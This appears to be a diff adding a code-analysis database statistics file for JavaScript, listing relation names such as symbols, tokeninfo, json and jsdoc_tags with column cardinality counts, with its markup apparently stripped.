+8 +28 +5528 + + +28 +588233 +2097 + + + + + + + + +declared_function_signature +62664 + + +node +62664 + + +sig +21731 + + + + +node +sig + + +12 + + +1 +2 +62664 + + + + + + +sig +node + + +12 + + +1 +2 +16826 + + +2 +3 +2358 + + +3 +6 +1683 + + +6 +10251 +864 + + + + + + + + +invoke_expr_signature +140668 + + +node +140668 + + +sig +9111 + + + + +node +sig + + +12 + + +1 +2 +140668 + + + + + + +sig +node + + +12 + + +1 +2 +4612 + + +2 +3 +1819 + + +3 +4 +737 + + +4 +6 +696 + + +6 +14 +705 + + +14 +68351 +542 + + + + + + + + +invoke_expr_overload_index +73550 + + +node +73550 + + +index +47 + + + + +node +index + + +12 + + +1 +2 +73550 + + + + + + +index +node + + +12 + + +1 +2 +17 + + +2 +3 +7 + + +3 +5 +4 + + +5 +6 +4 + + +6 +8 +3 + + +8 +16 +4 + + +27 +155 +4 + + +211 +68535 +4 + + + + + + + + +symbols +10192 + + +id +10192 + + +kind +3 + + +name +7872 + + + + +id +kind + + +12 + + +1 +2 +10192 + + + + + + +id +name + + +12 + + +1 +2 +10192 + + + + + + +kind +id + + +12 + + +584 +585 +1 + + +2385 +2386 +1 + + +7223 +7224 +1 + + + + + + +kind +name + + +12 + + +30 +31 +1 + + +2385 +2386 +1 + + +5609 +5610 +1 + + + + + + +name +id + + +12 + + +1 +2 +6929 + + +2 +3 +533 + + +3 +273 +410 + + + + + + +name +kind + + +12 + + +1 +2 +7730 + + +2 +4 +142 + + + + + + + + +symbol_parent +7807 + + +symbol +7807 + + +parent +1727 + + + + +symbol +parent + + +12 + + +1 +2 +7807 + + + + + + +parent +symbol + + +12 + + +1 +2 +778 + + +2 +3 +304 + + +3 +4 +212 + + +4 +5 +111 + + +5 +8 +152 + + +8 +26 +136 + + +26 +297 +34 + + + + + + + + +symbol_module +100 + + +symbol +97 + + +moduleName +98 + + + + +symbol +moduleName + + +12 + + +1 +2 +95 + + +2 +4 +2 + + + + + + +moduleName +symbol + + +12 + + +1 +2 +96 + + +2 +3 +2 + + + + + + + + +symbol_global +354 + + +symbol +354 + + +globalName +350 + + + + +symbol +globalName + + +12 + + +1 +2 +354 + + + + + + +globalName +symbol + + +12 + + +1 +2 +347 + + +2 +4 +3 + + + + + + + + +ast_node_symbol +8173 + + +node +8173 + + +symbol +8155 + + + + +node +symbol + + +12 + + +1 +2 +8173 + + + + + + +symbol +node + + +12 + + +1 +2 +8147 + + +2 +12 +8 + + + + + + + + +type_symbol +12383 + + +typ +12383 + + +symbol +6743 + + + + +typ +symbol + + +12 + + +1 +2 +12383 + + + + + + +symbol +typ + + +12 + + +1 +2 +6240 + + +2 +3070 +503 + + + + + + + + +type_property +331170 + + +typ +49305 + + +name +22420 + + +propertyType +130857 + + + + +typ +name + + +12 + + +1 +2 +10275 + + +2 +3 +14770 + + +3 +4 +6020 + + +4 +5 +3153 + + +5 +6 +1700 + + +6 +7 +4257 + + +7 +19 +3783 + + +19 +23 +3833 + + +23 +1390 +1514 + + + + + + +typ +propertyType + + +12 + + +1 +2 +19351 + + +2 +3 +10786 + + +3 +4 +5073 + + +4 +6 +2639 + + +6 +7 +3864 + + +7 +22 +3334 + + +22 +33 +3710 + + +33 +1390 +548 + + + + + + +name +typ + + +12 + + +1 +2 +4735 + + +2 +3 +7379 + + +3 +4 +2728 + + +4 +5 +1467 + + +5 +7 +1481 + + +7 +11 +1878 + + +11 +30 +1682 + + +30 +7825 +1070 + + + + + + +name +propertyType + + +12 + + +1 +2 +14690 + + +2 +3 +2698 + + +3 +4 +1925 + + +4 +8 +1697 + + +8 +3373 +1410 + + + + + + +propertyType +typ + + +12 + + +1 +2 +112801 + + +2 +3 +12999 + + +3 +19440 +5057 + + + + + + +propertyType +name + + +12 + + +1 +2 +129508 + + +2 +3475 +1349 + + + + + + + + +lines +id +1622184 + + +id +1622184 + + +toplevel +5312 + + +text +648122 + + +terminator +6 + + + + +id +toplevel + + +12 + + +1 +2 +1622184 + + + + + + +id +text + + +12 + + +1 +2 +1622184 + + + + + + +id +terminator + + +12 + + +1 +2 +1622184 + + + + + + +toplevel +id + + +12 + + +1 +12 +425 + + +12 +24 +415 + + +24 +37 +419 + + +37 +50 +404 + + +50 +66 +411 + + +66 +85 +400 + + +85 +108 +405 + + +108 +138 +402 + + +138 +174 +402 + + +174 +232 +405 + + +232 +331 +399 + + +331 +547 +399 + + +548 +4700 +399 + + +4783 +277404 +27 + + + + + + +toplevel +text + + +12 + + +1 +11 +441 + + +11 +21 +427 + + +21 +30 +414 + + +30 +40 +452 + + +40 +51 +435 + + +51 +64 +413 + + +64 +79 +404 + + +79 +96 +401 + + +96 +121 +400 + + +121 +158 +401 + + +158 +220 +399 + + +220 +387 +401 + + +388 +60934 +324 + + + + + + +toplevel +terminator + + +12 + + +1 +2 +5046 + + +2 +6 +266 + + + + + + +text +id + + +12 + + +1 +2 +513961 + + +2 +3 +84265 + + +3 +49 +48993 + + +49 +175121 +903 + + + + + + +text +toplevel + + +12 + + +1 +2 +569267 + + +2 +3 +56143 + + +3 +5068 +22712 + + + + + + +text +terminator + + +12 + + +1 +2 +647931 + + +2 +4 +191 + + + + + + +terminator +id + + +12 + + +3 +4 +3 + + +349 +350 +1 + + +1830 +1831 +1 + + +1619996 +1619997 +1 + + + + + + +terminator +toplevel + + +12 + + +3 +4 +3 + + +11 +12 +1 + + +349 +350 +1 + + +5218 +5219 +1 + + + + + + +terminator +text + + +12 + + +1 +2 +3 + + +110 +111 +1 + + +1093 +1094 +1 + + +647111 +647112 +1 + + + + + + + + +indentation +1145010 + + +file +5728 + + +lineno +40788 + + +indentChar +2 + + +indentDepth +72 + + + + +file +lineno + + +12 + + +1 +9 +440 + + +9 +18 +471 + + +18 +29 +439 + + +29 +41 +451 + + +41 +54 +460 + + +54 +71 +442 + + +71 +91 +441 + + +91 +118 +430 + + +118 +152 +432 + + +152 +205 +434 + + +205 +295 +431 + + +295 +503 +430 + + +503 +38151 +427 + + + + + + +file +indentChar + + +12 + + +1 +2 +5692 + + +2 +3 +36 + + + + + + +file +indentDepth + + +12 + + +1 +2 +287 + + +2 +3 +401 + + +3 +4 +665 + + +4 +5 +815 + + +5 +6 +814 + + +6 +7 +687 + + +7 +8 +567 + + +8 +9 +390 + + +9 +11 +503 + + +11 +17 +462 + + +17 +67 +137 + + + + + + +lineno +file + + +12 + + +1 +2 +10935 + + +2 +3 +5303 + + +3 +4 +12061 + + +4 +6 +3644 + + +6 +13 +3223 + + +13 +31 +3090 + + +31 +3986 +2532 + + + + + + +lineno +indentChar + + +12 + + +1 +2 +38720 + + +2 +3 +2068 + + + + + + +lineno +indentDepth + + +12 + + +1 +2 +11626 + + +2 +3 +7847 + + +3 +4 +10434 + + +4 +5 +2688 + + +5 +8 +3316 + + +8 +13 +3144 + + +13 +39 +1733 + + + + + + +indentChar +file + + +12 + + +42 +43 +1 + + +5722 +5723 +1 + + + + + + +indentChar +lineno + + +12 + + +2068 +2069 +1 + + +40788 +40789 +1 + + + + + + +indentChar +indentDepth + + +12 + + +10 +11 +1 + + +72 +73 +1 + + + + + + +indentDepth +file + + +12 + + +1 +6 +6 + + +6 +9 +6 + + +9 +20 +6 + + +21 +30 +6 + + +38 +57 +6 + + +59 +90 +6 + + +90 +124 +6 + + +132 +160 +6 + + +165 +211 +6 + + +213 +337 +6 + + +377 +1532 +6 + + +1919 +5487 +6 + + + + + + +indentDepth +lineno + + +12 + + +2 +8 +6 + + +11 +19 +6 + + +25 +44 +6 + + +53 +67 +6 + + +67 +89 +6 + + +102 +169 +6 + + +183 +239 +6 + + +269 +411 +6 + + +417 +971 +6 + + +1129 +2732 +6 + + +4374 +9301 +6 + + +11828 +21226 +6 + + + + + + +indentDepth +indentChar + + +12 + + +1 +2 +62 + + +2 +3 +10 + + + + + + + + +js_parse_errors +3 + + +id +3 + + +toplevel +3 + + +message +1 + + +line +3 + + + + +id +toplevel + + +12 + + +1 +2 +3 + + + + + + +id +message + + +12 + + +1 +2 +3 + + + + + + +id +line + + +12 + + +1 +2 +3 + + + + + + +toplevel +id + + +12 + + +1 +2 +3 + + + + + + +toplevel +message + + +12 + + +1 +2 +3 + + + + + + +toplevel +line + + +12 + + +1 +2 +3 + + + + + + +message +id + + +12 + + +3 +4 +1 + + + + + + +message +toplevel + + +12 + + +3 +4 +1 + + + + + + +message +line + + +12 + + +3 +4 +1 + + + + + + +line +id + + +12 + + +1 +2 +3 + + + + + + +line +toplevel + + +12 + + +1 +2 +3 + + + + + + +line +message + + +12 + + +1 +2 +3 + + + + + + + + +regexpterm +id +33197 + + +id +33197 + + +kind +25 + + +parent +13313 + + +idx +76 + + +tostring +4610 + + + + +id +kind + + +12 + + +1 +2 +33197 + + + + + + +id +parent + + +12 + + +1 +2 +33197 + + + + + + +id +idx + + +12 + + +1 +2 +33197 + + + + + + +id +tostring + + +12 + + +1 +2 +33197 + + + + + + +kind +id + + +12 + + +1 +4 +2 + + +7 +12 +2 + + +12 +16 +2 + + +59 +100 +2 + + +146 +265 +2 + + +445 +479 +2 + + +599 +620 +2 + + +637 +642 +2 + + +826 +1058 +2 + + +1067 +1474 +2 + + +1573 +1693 +2 + + +2613 +3372 +2 + + +15489 +15490 +1 + + + + + + +kind +parent + + +12 + + +1 +4 +2 + + +7 +8 +1 + + +11 +12 +2 + + +15 +46 +2 + + +79 +132 +2 + + +132 +331 +2 + + +367 +381 +2 + + +437 +638 +2 + + +641 +737 +2 + + +825 +1005 +2 + + +1391 +1403 +2 + + +1465 +1645 +2 + + +2691 +3963 +2 + + + + + + +kind +idx + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +3 + + +6 +8 +2 + + +12 +15 +2 + + +17 +19 +2 + + +19 +21 +2 + + +22 +23 +1 + + +23 +24 +2 + + +25 +27 +2 + + +27 +30 +2 + + +42 +49 +2 + + +73 +74 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +6 + + +2 +5 +2 + + +6 +11 +2 + + +13 +28 +2 + + +31 +59 +2 + + +65 +78 +2 + + +100 +118 +2 + + +149 +171 +2 + + +175 +391 +2 + + +433 +791 +2 + + +1992 +1993 +1 + + + + + + +parent +id + + +12 + + +1 +2 +7691 + + +2 +3 +2568 + + +3 +4 +924 + + +4 +7 +1189 + + +7 +77 +941 + + + + + + +parent +kind + + +12 + + +1 +2 +10080 + + +2 +3 +2026 + + +3 +5 +1068 + + +5 +9 +139 + + + + + + +parent +idx + + +12 + + +1 +2 +7691 + + +2 +3 +2568 + + +3 +4 +924 + + +4 +7 +1189 + + +7 +77 +941 + + + + + + +parent +tostring + + +12 + + +1 +2 +7733 + + +2 +3 +2644 + + +3 +4 +940 + + +4 +7 +1230 + + +7 +32 +766 + + + + + + +idx +id + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +4 +8 +7 + + +8 +13 +7 + + +15 +22 +6 + + +26 +35 +5 + + +37 +51 +6 + + +53 +75 +6 + + +79 +141 +6 + + +186 +325 +6 + + +385 +1182 +6 + + +1578 +13314 +5 + + + + + + +idx +kind + + +12 + + +1 +2 +18 + + +2 +3 +15 + + +3 +4 +8 + + +4 +5 +7 + + +5 +8 +6 + + +9 +13 +6 + + +13 +16 +7 + + +17 +20 +7 + + +21 +25 +2 + + + + + + +idx +parent + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +4 +8 +7 + + +8 +13 +7 + + +15 +22 +6 + + +26 +35 +5 + + +37 +51 +6 + + +53 +75 +6 + + +79 +141 +6 + + +186 +325 +6 + + +385 +1182 +6 + + +1578 +13314 +5 + + + + + + +idx +tostring + + +12 + + +1 +2 +8 + + +2 +3 +8 + + +3 +4 +4 + + +5 +7 +6 + + +7 +10 +6 + + +10 +15 +6 + + +16 +21 +7 + + +21 +26 +6 + + +29 +48 +6 + + +48 +75 +6 + + +82 +147 +6 + + +158 +940 +6 + + +3258 +3259 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +3026 + + +2 +3 +751 + + +3 +5 +391 + + +5 +49 +346 + + +49 +1013 +96 + + + + + + +tostring +kind + + +12 + + +1 +2 +4605 + + +2 +3 +5 + + + + + + +tostring +parent + + +12 + + +1 +2 +3041 + + +2 +3 +746 + + +3 +5 +389 + + +5 +53 +346 + + +54 +875 +88 + + + + + + +tostring +idx + + +12 + + +1 +2 +4102 + + +2 +5 +351 + + +5 +58 +157 + + + + + + + + +regexp_parse_errors +id +122 + + +id +122 + + +regexp +41 + + +message +5 + + + + +id +regexp + + +12 + + +1 +2 +122 + + + + + + +id +message + + +12 + + +1 +2 +122 + + + + + + +regexp +id + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +3 +4 +12 + + +4 +5 +5 + + +5 +6 +7 + + +6 +7 +1 + + + + + + +regexp +message + + +12 + + +1 +2 +18 + + +2 +3 +4 + + +3 +4 +19 + + + + + + +message +id + + +12 + + +1 +2 +1 + + +8 +9 +1 + + +22 +23 +1 + + +23 +24 +1 + + +68 +69 +1 + + + + + + +message +regexp + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +22 +23 +1 + + +23 +24 +1 + + +35 +36 +1 + + + + + + + + +is_greedy +2629 + + +id +2629 + + + + + +isOptionalChaining +100 + + +id +100 + + + + + + +range_quantifier_lower_bound +146 + + +id +146 + + +lo +11 + + + + +id +lo + + +12 + + +1 +2 +146 + + + + + + +lo +id + + +12 + + +1 +2 +4 + + +4 +5 +1 + + +5 +6 +1 + + +17 +18 +1 + + +20 +21 +1 + + +28 +29 +1 + + +33 +34 +1 + + +35 +36 +1 + + + + + + + + +range_quantifier_upper_bound +45 + + +id +45 + + +hi +13 + + + + +id +hi + + +12 + + +1 +2 +45 + + + + + + +hi +id + + +12 + + +1 +2 +5 + + +2 +3 +3 + + +3 +4 +2 + + +8 +9 +1 + + +9 +10 +1 + + +11 +12 +1 + + + + + + + + +is_capture +1280 + + +id +1280 + + +number +14 + + + + +id +number + + +12 + + +1 +2 +1280 + + + + + + +number +id + + +12 + + +1 +2 +1 + + +2 +3 +2 + + +4 +5 +2 + + +6 +7 +2 + + +7 +8 +1 + + +12 +13 +1 + + +23 +24 +1 + + +55 +56 +1 + + +108 +109 +1 + + +276 +277 +1 + + +774 +775 +1 + + + + + + + + +is_named_capture +1280 + + +id +1280 + + +name +14 + + + + +id +name + + +12 + + +1 +2 +1280 + + + + + + +name +id + + +12 + + +1 +2 +1 + + +2 +3 +2 + + +4 +5 +2 + + +6 +7 +2 + + +7 +8 +1 + + +12 +13 +1 + + +23 +24 +1 + + +55 +56 +1 + + +108 +109 +1 + + +276 +277 +1 + + +774 +775 +1 + + + + + + + + +is_inverted +458 + + +id +458 + + + + + +regexp_const_value +19032 + + +id +19032 + + +value +237 + + + + +id +value + + +12 + + +1 +2 +19032 + + + + + + +value +id + + +12 + + +1 +2 +80 + + +2 +3 +12 + + +3 +4 +10 + + +4 +5 +20 + + +5 +17 +18 + + +17 +30 +18 + + +30 +66 +18 + + +68 +143 +18 + + +155 +242 +18 + + +251 +555 +18 + + +581 +1013 +7 + + + + + + + + +char_class_escape +1573 + + +id +1573 + + +value +6 + + + + +id +value + + +12 + + +1 +2 +1573 + + + + + + +value +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +unicode_property_escapename +1573 + + +id +1573 + + +name +6 + + + + +id +name + + +12 + + +1 +2 +1573 + + + + + + +name +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +unicode_property_escapevalue +1573 + + +id +1573 + + +value +6 + + + + +id +value + + +12 + + +1 +2 +1573 + + + + + + +value +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +backref +11 + + +id +11 + + +value +4 + + + + +id +value + + +12 + + +1 +2 +11 + + + + + + +value +id + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +6 +7 +1 + + + + + + + + +named_backref +11 + + +id +11 + + +name +4 + + + + +id +name + + +12 + + +1 +2 +11 + + + + + + +name +id + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +6 +7 +1 + + + + + + + + +tokeninfo +id +8770869 + + +id +8770869 + + +kind +9 + + +toplevel +5312 + + +idx +1581031 + + +value +234179 + + + + +id +kind + + +12 + + +1 +2 +8770869 + + + + + + +id +toplevel + + +12 + + +1 +2 +8770869 + + + + + + +id +idx + + +12 + + +1 +2 +8770869 + + + + + + +id +value + + +12 + + +1 +2 +8770869 + + + + + + +kind +id + + +12 + + +2773 +2774 +1 + + +5312 +5313 +1 + + +15526 +15527 +1 + + +31654 +31655 +1 + + +269555 +269556 +1 + + +551767 +551768 +1 + + +557620 +557621 +1 + + +2268328 +2268329 +1 + + +5068334 +5068335 +1 + + + + + + +kind +toplevel + + +12 + + +471 +472 +1 + + +2204 +2205 +1 + + +2851 +2852 +1 + + +3204 +3205 +1 + + +5089 +5090 +1 + + +5219 +5220 +1 + + +5294 +5295 +1 + + +5300 +5301 +1 + + +5312 +5313 +1 + + + + + + +kind +idx + + +12 + + +1949 +1950 +1 + + +2130 +2131 +1 + + +8409 +8410 +1 + + +12883 +12884 +1 + + +51181 +51182 +1 + + +130388 +130389 +1 + + +409369 +409370 +1 + + +583910 +583911 +1 + + +1104589 +1104590 +1 + + + + + + +kind +value + + +12 + + +1 +2 +2 + + +2 +3 +1 + + +34 +35 +1 + + +52 +53 +1 + + +1596 +1597 +1 + + +59827 +59828 +1 + + +85214 +85215 +1 + + +87463 +87464 +1 + + + + + + +toplevel +id + + +12 + + +1 +45 +403 + + +45 +95 +408 + + +95 +149 +399 + + +149 +212 +408 + + +212 +291 +405 + + +291 +362 +399 + + +362 +461 +401 + + +461 +585 +399 + + +585 +756 +399 + + +756 +1013 +399 + + +1013 +1389 +399 + + +1389 +2313 +400 + + +2320 +6681 +399 + + +6717 +1581032 +94 + + + + + + +toplevel +kind + + +12 + + +1 +5 +174 + + +5 +6 +1046 + + +6 +7 +1326 + + +7 +8 +1279 + + +8 +9 +1214 + + +9 +10 +273 + + + + + + +toplevel +idx + + +12 + + +1 +45 +403 + + +45 +95 +408 + + +95 +149 +399 + + +149 +212 +408 + + +212 +291 +405 + + +291 +362 +399 + + +362 +461 +401 + + +461 +585 +399 + + +585 +756 +399 + + +756 +1013 +399 + + +1013 +1389 +399 + + +1389 +2313 +400 + + +2320 +6681 +399 + + +6717 +1581032 +94 + + + + + + +toplevel +value + + +12 + + +1 +21 +423 + + +21 +33 +416 + + +33 +44 +424 + + +44 +55 +400 + + +55 +65 +426 + + +65 +76 +407 + + +76 +88 +426 + + +88 +102 +402 + + +102 +120 +405 + + +120 +144 +401 + + +144 +180 +400 + + +180 +260 +400 + + +260 +46630 +382 + + + + + + +idx +id + + +12 + + +1 +2 +1083847 + + +2 +3 +166188 + + +3 +6 +136823 + + +6 +9 +123495 + + +9 +5313 +70678 + + + + + + +idx +kind + + +12 + + +1 +2 +1175018 + + +2 +3 +207984 + + +3 +4 +120754 + + +4 +10 +77275 + + + + + + +idx +toplevel + + +12 + + +1 +2 +1083847 + + +2 +3 +166188 + + +3 +6 +136823 + + +6 +9 +123495 + + +9 +5313 +70678 + + + + + + +idx +value + + +12 + + +1 +2 +1089271 + + +2 +3 +165753 + + +3 +5 +104658 + + +5 +8 +145624 + + +8 +1449 +75725 + + + + + + +value +id + + +12 + + +1 +2 +104636 + + +2 +3 +47235 + + +3 +4 +20077 + + +4 +5 +16835 + + +5 +9 +19608 + + +9 +34 +17687 + + +34 +789848 +8101 + + + + + + +value +kind + + +12 + + +1 +2 +234168 + + +2 +3 +11 + + + + + + +value +toplevel + + +12 + + +1 +2 +174552 + + +2 +3 +34819 + + +3 +8 +18537 + + +8 +5313 +6271 + + + + + + +value +idx + + +12 + + +1 +2 +105969 + + +2 +3 +47057 + + +3 +4 +19986 + + +4 +5 +16682 + + +5 +9 +19402 + + +9 +36 +17686 + + +36 +347359 +7397 + + + + + + + + +next_token +104943 + + +comment +104943 + + +token +74457 + + + + +comment +token + + +12 + + +1 +2 +104943 + + + + + + +token +comment + + +12 + + +1 +2 +59983 + + +2 +3 +8628 + + +3 +12 +5601 + + +12 +141 +245 + + + + + + + + +json +id +1643352 + + +id +1643352 + + +kind +6 + + +parent +617634 + + +idx +159429 + + +tostring +768907 + + + + +id +kind + + +12 + + +1 +2 +1643352 + + + + + + +id +parent + + +12 + + +1 +2 +1643352 + + + + + + +id +idx + + +12 + + +1 +2 +1643352 + + + + + + +id +tostring + + +12 + + +1 +2 +1643352 + + + + + + +kind +id + + +12 + + +24 +25 +1 + + +654 +655 +1 + + +175925 +175926 +1 + + +273113 +273114 +1 + + +441281 +441282 +1 + + +752355 +752356 +1 + + + + + + +kind +parent + + +12 + + +17 +18 +1 + + +411 +412 +1 + + +165183 +165184 +1 + + +167132 +167133 +1 + + +271547 +271548 +1 + + +452264 +452265 +1 + + + + + + +kind +idx + + +12 + + +10 +11 +1 + + +65 +66 +1 + + +152 +153 +1 + + +174 +175 +1 + + +198 +199 +1 + + +159429 +159430 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +2865 +2866 +1 + + +100735 +100736 +1 + + +271467 +271468 +1 + + +393837 +393838 +1 + + + + + + +parent +id + + +12 + + +1 +2 +127476 + + +2 +3 +184044 + + +3 +4 +285109 + + +4 +159430 +21005 + + + + + + +parent +kind + + +12 + + +1 +2 +179808 + + +2 +3 +437119 + + +3 +7 +707 + + + + + + +parent +idx + + +12 + + +1 +2 +127476 + + +2 +3 +184044 + + +3 +4 +285109 + + +4 +159430 +21005 + + + + + + +parent +tostring + + +12 + + +1 +2 +173483 + + +2 +3 +197229 + + +3 +4 +240036 + + +4 +135127 +6886 + + + + + + +idx +id + + +12 + + +1 +2 +158929 + + +3 +617635 +500 + + + + + + +idx +kind + + +12 + + +1 +2 +159178 + + +2 +7 +251 + + + + + + +idx +parent + + +12 + + +1 +2 +158929 + + +3 +617635 +500 + + + + + + +idx +tostring + + +12 + + +1 +2 +158929 + + +2 +429145 +500 + + + + + + +tostring +id + + +12 + + +1 +2 +511110 + + +2 +3 +165121 + + +3 +6 +69702 + + +6 +63547 +22974 + + + + + + +tostring +kind + + +12 + + +1 +2 +768907 + + + + + + +tostring +parent + + +12 + + +1 +2 +562365 + + +2 +3 +144455 + + +3 +10 +58431 + + +10 +63547 +3656 + + + + + + +tostring +idx + + +12 + + +1 +2 +554379 + + +2 +3 +185366 + + +3 +720 +29162 + + + + + + + + +json_literals +1026146 + + +value +397229 + + +raw +397431 + + +expr +1026146 + + + + +value +raw + + +12 + + +1 +2 +397027 + + +2 +3 +202 + + + + + + +value +expr + + +12 + + +1 +2 +216149 + + +2 +3 +128106 + + +3 +5 +28217 + + +5 +63547 +24757 + + + + + + +raw +value + + +12 + + +1 +2 +397431 + + + + + + +raw +expr + + +12 + + +1 +2 +216237 + + +2 +3 +128277 + + +3 +5 +28205 + + +5 +63547 +24712 + + + + + + +expr +value + + +12 + + +1 +2 +1026146 + + + + + + +expr +raw + + +12 + + +1 +2 +1026146 + + + + + + + + +json_properties +1186648 + + +obj +441238 + + +property +2285 + + +value +1186648 + + + + +obj +property + + +12 + + +1 +2 +685 + + +2 +3 +161803 + + +3 +4 +272428 + + +4 +252 +6322 + + + + + + +obj +value + + +12 + + +1 +2 +685 + + +2 +3 +161803 + + +3 +4 +272428 + + +4 +252 +6322 + + + + + + +property +obj + + +12 + + +1 +2 +1378 + + +2 +3 +371 + + +3 +4 +199 + + +4 +17 +174 + + +18 +429290 +163 + + + + + + +property +value + + +12 + + +1 +2 +1378 + + +2 +3 +371 + + +3 +4 +199 + + +4 +17 +174 + + +18 +429290 +163 + + + + + + +value +obj + + +12 + + +1 +2 +1186648 + + + + + + +value +property + + +12 + + +1 +2 +1186648 + + + + + + + + +json_errors +id +1 + + +id +1 + + +message +1 + + + + +id +message + + +12 + + +1 +2 +1 + + + + + + +message +id + + +12 + + +1 +2 +1 + + + + + + + + +json_locations +712 + + +locatable +712 + + +location +712 + + + + +locatable +location + + +12 + + +1 +2 +712 + + + + + + +location +locatable + + +12 + + +1 +2 +712 + + + + + + + + +hasLocation +19213780 + + +locatable +19213780 + + +location +15664049 + + + + +locatable +location + + +12 + + +1 +2 +19213780 + + + + + + +location +locatable + + +12 + + +1 +2 +12144311 + + +2 +3 +3490097 + + +3 +6 +29641 + + + + + + + + +entry_cfg_node +id +121542 + + +id +121542 + + +container +121542 + + + + +id +container + + +12 + + +1 +2 +121542 + + + + + + +container +id + + +12 + + +1 +2 +121542 + + + + + + + + +exit_cfg_node +id +121542 + + +id +121542 + + +container +121542 + + + + +id +container + + +12 + + +1 +2 +121542 + + + + + + +container +id + + +12 + + +1 +2 +121542 + + + + + + + + +guard_node +177785 + + +id +177785 + + +kind +2 + + +test +91338 + + + + +id +kind + + +12 + + +1 +2 +177785 + + + + + + +id +test + + +12 + + +1 +2 +177785 + + + + + + +kind +id + + +12 + + +86336 +86337 +1 + + +91449 +91450 +1 + + + + + + +kind +test + + +12 + + +82430 +82431 +1 + + +89999 +90000 +1 + + + + + + +test +id + + +12 + + +1 +2 +10245 + + +2 +3 +76994 + + +3 +21 +4099 + + + + + + +test +kind + + +12 + + +1 +2 +10247 + + +2 +3 +81091 + + + + + + + + +successor +6873752 + + +pred +6717415 + + +succ +6718602 + + + + +pred +succ + + +12 + + +1 +2 +6588118 + + +2 +21 +129297 + + + + + + +succ +pred + + +12 + + +1 +2 +6617438 + + +2 +253 +101164 + + + + + + + + +jsdoc +id +19270 + + +id +19270 + + +description +9383 + + +comment +19270 + + + + +id +description + + +12 + + +1 +2 +19270 + + + + + + +id +comment + + +12 + + +1 +2 +19270 + + + + + + +description +id + + +12 + + +1 +2 +7588 + + +2 +3 +1387 + + +3 +5727 +408 + + + + + + +description +comment + + +12 + + +1 +2 +7588 + + +2 +3 +1387 + + +3 +5727 +408 + + + + + + +comment +id + + +12 + + +1 +2 +19270 + + + + + + +comment +description + + +12 + + +1 +2 +19270 + + + + + + + + +jsdoc_tags +id +29323 + + +id +29323 + + +title +92 + + +parent +14226 + + +idx +66 + + +tostring +92 + + + + +id +title + + +12 + + +1 +2 +29323 + + + + + + +id +parent + + +12 + + +1 +2 +29323 + + + + + + +id +idx + + +12 + + +1 +2 +29323 + + + + + + +id +tostring + + +12 + + +1 +2 +29323 + + + + + + +title +id + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +5 +7 + + +5 +7 +8 + + +8 +12 +7 + + +13 +17 +7 + + +20 +35 +7 + + +40 +55 +7 + + +58 +111 +7 + + +114 +167 +8 + + +170 +331 +7 + + +587 +913 +7 + + +2221 +10284 +4 + + + + + + +title +parent + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +5 + + +4 +6 +7 + + +6 +10 +8 + + +10 +16 +7 + + +16 +26 +7 + + +26 +36 +7 + + +38 +67 +7 + + +68 +111 +7 + + +137 +213 +7 + + +232 +702 +7 + + +870 +6020 +7 + + + + + + +title +idx + + +12 + + +1 +2 +35 + + +2 +3 +8 + + +3 +4 +7 + + +4 +5 +8 + + +5 +6 +8 + + +6 +7 +5 + + +7 +8 +4 + + +8 +10 +8 + + +10 +31 +7 + + +46 +59 +2 + + + + + + +title +tostring + + +12 + + +1 +2 +92 + + + + + + +parent +id + + +12 + + +1 +2 +6064 + + +2 +3 +4452 + + +3 +4 +2064 + + +4 +5 +913 + + +5 +67 +733 + + + + + + +parent +title + + +12 + + +1 +2 +6972 + + +2 +3 +4911 + + +3 +4 +1793 + + +4 +8 +550 + + + + + + +parent +idx + + +12 + + +1 +2 +6064 + + +2 +3 +4452 + + +3 +4 +2064 + + +4 +5 +913 + + +5 +67 +733 + + + + + + +parent +tostring + + +12 + + +1 +2 +6972 + + +2 +3 +4911 + + +3 +4 +1793 + + +4 +8 +550 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +2 +3 +29 + + +3 +4 +6 + + +4 +5 +5 + + +5 +6 +6 + + +7 +11 +5 + + +11 +53 +5 + + +89 +1647 +5 + + +3710 +14227 +3 + + + + + + +idx +title + + +12 + + +1 +2 +9 + + +2 +3 +31 + + +3 +4 +9 + + +4 +6 +6 + + +8 +21 +5 + + +29 +61 +5 + + +70 +71 +1 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +2 +3 +29 + + +3 +4 +6 + + +4 +5 +5 + + +5 +6 +6 + + +7 +11 +5 + + +11 +53 +5 + + +89 +1647 +5 + + +3710 +14227 +3 + + + + + + +idx +tostring + + +12 + + +1 +2 +9 + + +2 +3 +31 + + +3 +4 +9 + + +4 +6 +6 + + +8 +21 +5 + + +29 +61 +5 + + +70 +71 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +5 +7 + + +5 +7 +8 + + +8 +12 +7 + + +13 +17 +7 + + +20 +35 +7 + + +40 +55 +7 + + +58 +111 +7 + + +114 +167 +8 + + +170 +331 +7 + + +587 +913 +7 + + +2221 +10284 +4 + + + + + + +tostring +title + + +12 + + +1 +2 +92 + + + + + + +tostring +parent + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +5 + + +4 +6 +7 + + +6 +10 +8 + + +10 +16 +7 + + +16 +26 +7 + + +26 +36 +7 + + +38 +67 +7 + + +68 +111 +7 + + +137 +213 +7 + + +232 +702 +7 + + +870 +6020 +7 + + + + + + +tostring +idx + + +12 + + +1 +2 +35 + + +2 +3 +8 + + +3 +4 +7 + + +4 +5 +8 + + +5 +6 +8 + + +6 +7 +5 + + 